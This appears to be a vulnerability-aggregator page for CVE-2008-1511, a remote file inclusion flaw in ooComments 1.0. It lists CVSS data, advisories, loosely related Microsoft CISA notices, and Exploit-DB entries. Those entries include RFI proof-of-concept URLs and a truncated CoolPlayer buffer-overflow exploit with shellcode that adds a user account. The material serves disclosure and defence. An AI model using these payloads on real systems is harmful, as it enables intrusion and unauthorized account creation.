CVE-2008-1511
Published 2008-03-25
CVE-2008-1511: Multiple PHP remote file inclusion vulnerabilities in ooComments 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the PathToComment…
Priority P340 · critical · 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 2.94% (85.4th percentile)
Multiple PHP remote file inclusion vulnerabilities in ooComments 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the PathToComment parameter for (1) classes/class_admin.php and (2) classes/class_comments.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oocomments | oocomments | — | — |
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
cisa · 7.8 HIGH
GHSA
GHSA-g5gj-rfrw-qg5p: Multiple PHP remote file inclusion vulnerabilities in ooComments 1
ghsa_unreviewed·2022-05-01
CVE-2008-1511 [HIGH] CWE-94 GHSA-g5gj-rfrw-qg5p: Multiple PHP remote file inclusion vulnerabilities in ooComments 1
Multiple PHP remote file inclusion vulnerabilities in ooComments 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the PathToComment parameter for (1) classes/class_admin.php and (2) classes/class_comments.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
CISA
Microsoft Graphics Device Interface (GDI) Privilege Escalation Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2017-0001 [HIGH] Microsoft Graphics Device Interface (GDI) Privilege Escalation Vulnerability
Vulnerability: Microsoft Graphics Device Interface (GDI) Privilege Escalation Vulnerability
Affected: Microsoft Graphics Device Interface (GDI)
The Graphics Device Interface (GDI) in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allows local users to gain privileges
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-0001
Remediation Due Date: 2022-03-24
CISA
Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2017-8540 [HIGH] CWE-119 Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
Vulnerability: Microsoft Malware Protection Engine Improper Restriction of Operations Vulnerability
Affected: Microsoft Malware Protection Engine
The Microsoft Malware Protection Engine running on Microsoft Forefront and Microsoft Defender on Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016, Microsoft Exchange Server 2013 and 2016, does not properly scan a specially crafted file leading to memory corruption. aka "Microsoft Malware Protection Engine Remote Code Execution Vulnerability".
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-8540
Remediation Due Date: 2022-03-24
No detection rules found.
Exploit-DB
CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
exploitdb·2008-12-22
CVE-2008-5735 CoolPlayer 2.19 - '.Skin' Local Buffer Overflow
---
# CoolPlayer (Skin) Buffer Overflow
# maybe all versions are affected :)
# By:Encrypt3d.M!nd
#
# Original Exploit: by r0ut3r
# http://www.milw0rm.com/exploits/7536
#
# I've tested it on my box (winxp sp3) and it didn't work
# so I've rewritten the exploit and this is working
# tested: Windows xp sp3 patched
# version tested:2.17,2.18,2.19
#
# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends
###################################################
chars = "A"*1511
eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp
header = "[CoolPlayer Skin]\nPlaylistSkin="
# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x
Exploit-DB
ooComments 1.0 - '/classes/class_admin.php?PathToComment' Remote File Inclusion
exploitdb·2008-03-22
CVE-2008-1511 ooComments 1.0 - '/classes/class_admin.php?PathToComment' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/28401/info
ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ooComments 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/classes/class_admin.php?PathToComment=ZoRLu.txt?
Exploit-DB
ooComments 1.0 - '/classes/class_comments.php?PathToComment' Remote File Inclusion
exploitdb·2008-03-22
CVE-2008-1511 ooComments 1.0 - '/classes/class_comments.php?PathToComment' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/28401/info
ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
ooComments 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/classes/class_comments.php?PathToComment=ZoRLu.txt?
No writeups or analysis indexed.
2008-03-25
Published